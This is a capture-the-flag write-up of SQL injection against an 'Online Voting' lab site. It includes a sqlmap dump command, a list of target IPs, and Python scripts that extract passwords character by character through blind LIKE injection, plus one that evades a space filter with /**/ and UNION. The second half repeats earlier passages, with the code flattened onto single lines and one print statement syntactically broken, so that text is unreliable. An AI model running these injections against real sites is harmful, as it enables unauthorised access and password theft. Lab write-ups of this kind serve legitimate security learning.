Synopsis
Once we had mapped the network, I found a machine running an apache server so I decided to check it out. The web site shows us different ways of authentification (10 differents) and the title was "Online Voting".
First flag
This one was easy, a simple nikto on the website and we see a flag in the http headers.
SQL Easy
We quickly understand that all the 10 ways of authentification were SQL injectables. So let's try the first one (the easy one).
I tried sqlmap on it and I was able to dump all the users table.
sqlmap -u http://192.168.248.111/challenge1.php --form --batch -D DBchallenge1 -T users -C users --dump
FLAG{...} in one of the of users password. Well done !
Remember, for each steps, you needed to try on all the 11 other IPs.
I grep all the servers with an open port 80 in our nmap output then, I have requested all thoose servers to check the existance of challenge1.php. Once it is done you had the 12 IPs you needed to focus on.
192.168.8.61
192.168.20.211
192.168.36.134
192.168.68.201
192.168.80.177
192.168.104.214
192.168.148.12
192.168.168.135
192.168.196.185
192.168.208.207
192.168.240.79
192.168.248.111
2nd SQL (blind)
Let's go to the next authentification, because I had all the passwords and username, I simply tried to login in normally. OK, it works but no flag.
So I guessed that, we needed, like the first one to find a user with the flag as password. Let's go then.
I tried sqlmap again but it didn't worked.
So let's go on python ^^.
First, we need to find wich user has the flag, hopefully, I got them all thanks to the first challenge:
#!/usr/bin/env python3
import requests
import sys
f = open("users").read().split("\n")
while(1):
for user in f:
data = {'username':user,'passwd':"""1' or passwd like 'FLAG{%}'""", 'login':'Login'}
if "Login failed" not in requests.post("http://%s/challenge2.php" % sys.argv[1], data=data).text:
print("[+] USER WITH FLAG = ",user)
break
Well, Guillaume is our target, now we are gonna get its password (the flag):
#!/usr/bin/env python3
import requests
import sys
flag = 'FLAG{'
while(1):
for i in "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789" :
data = {'username':"Guillaume",'passwd':"""1' or passwd like '"""+flag+i+"""%""",'login':'Login'}
if "Login failed" not in requests.post("http://%s/challenge2.php" % sys.argv[1], data=data).text:
flag+=i
print(flag)
if (len(flag)==37):
print ("[+] FLAG : "flag.upper()+"}")
break
As you can see, I use the sql LIKE statement to detect when the prefix of the flag is OK.
We can retrieve the flag's characters one by one with this technique.
Each time the Login sends us a valid response, we know that we can add this character to the flag and restart the operation. We can stop when the flag's length is the OK.
3rd SQL
This time the query is filtered. When the login is wrong, the web page shows us the sql query:
Thanks to that, we understand that the filter remove all the spaces. One of techniques against that is to use /**/ as space. I don't know if other techniques were possible but, I used a known user with a wrong password + SQLI UNION technique + the filter bypass to get this flag:
#!/usr/bin/env python
import requests
import sys
flag = "FLAG{"
while 1:
for i in "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789" :
u=
"http://"+sys.argv[1]+"/challenge3.php?username=Eugenia&password=dd'/**/union/**/"+
"select/**/*/**/from/**/users/**/where/**/password/**/like/**/'"+flag+i+"%'/**/"+"and/**/"+
"LENGTH(password)='38&login=Login"
if ("Logged" in requests.get(url=u).text):
flag+=i
print(flag)
if (len(flag)==37):
print ("FLAG: %s}" % flag.upper())
break
I didn't had the time to continue the others sql injections but, most of the others teams didn't had procteded thoose flags so, I was able to get lot of points. ^^
sqlmap -u http://192.168.248.111/challenge1.php --form --batch -D DBchallenge1 -T users -C users --dump
I grep all the servers with an open port 80 in our nmap output then, I have requested all thoose servers to check the existance of challenge1.php. Once it is done you had the 12 IPs you needed to focus on.
192.168.8.61 192.168.20.211 192.168.36.134 192.168.68.201 192.168.80.177 192.168.104.214 192.168.148.12 192.168.168.135 192.168.196.185 192.168.208.207 192.168.240.79 192.168.248.111
I tried sqlmap again but it didn't worked.
So let's go on python ^^.
First, we need to find wich user has the flag, hopefully, I got them all thanks to the first challenge:
#!/usr/bin/env python3 import requests import sys f = open("users").read().split("\n") while(1): for user in f: data = {'username':user,'passwd':"""1' or passwd like 'FLAG{%}'""", 'login':'Login'} if "Login failed" not in requests.post("http://%s/challenge2.php" % sys.argv[1], data=data).text: print("[+] USER WITH FLAG = ",user) break
#!/usr/bin/env python3 import requests import sys flag = 'FLAG{' while(1): for i in "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789" : data = {'username':"Guillaume",'passwd':"""1' or passwd like '"""+flag+i+"""%""",'login':'Login'} if "Login failed" not in requests.post("http://%s/challenge2.php" % sys.argv[1], data=data).text: flag+=i print(flag) if (len(flag)==37): print ("[+] FLAG : "flag.upper()+"}") break
Each time the Login sends us a valid response, we know that we can add this character to the flag and restart the operation. We can stop when the flag's length is the OK.
Thanks to that, we understand that the filter remove all the spaces. One of techniques against that is to use /**/ as space. I don't know if other techniques were possible but, I used a known user with a wrong password + SQLI UNION technique + the filter bypass to get this flag:
#!/usr/bin/env python import requests import sys flag = "FLAG{" while 1: for i in "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789" : u= "http://"+sys.argv[1]+"/challenge3.php?username=Eugenia&password=dd'/**/union/**/"+ "select/**/*/**/from/**/users/**/where/**/password/**/like/**/'"+flag+i+"%'/**/"+"and/**/"+ "LENGTH(password)='38&login=Login" if ("Logged" in requests.get(url=u).text): flag+=i print(flag) if (len(flag)==37): print ("FLAG: %s}" % flag.upper()) break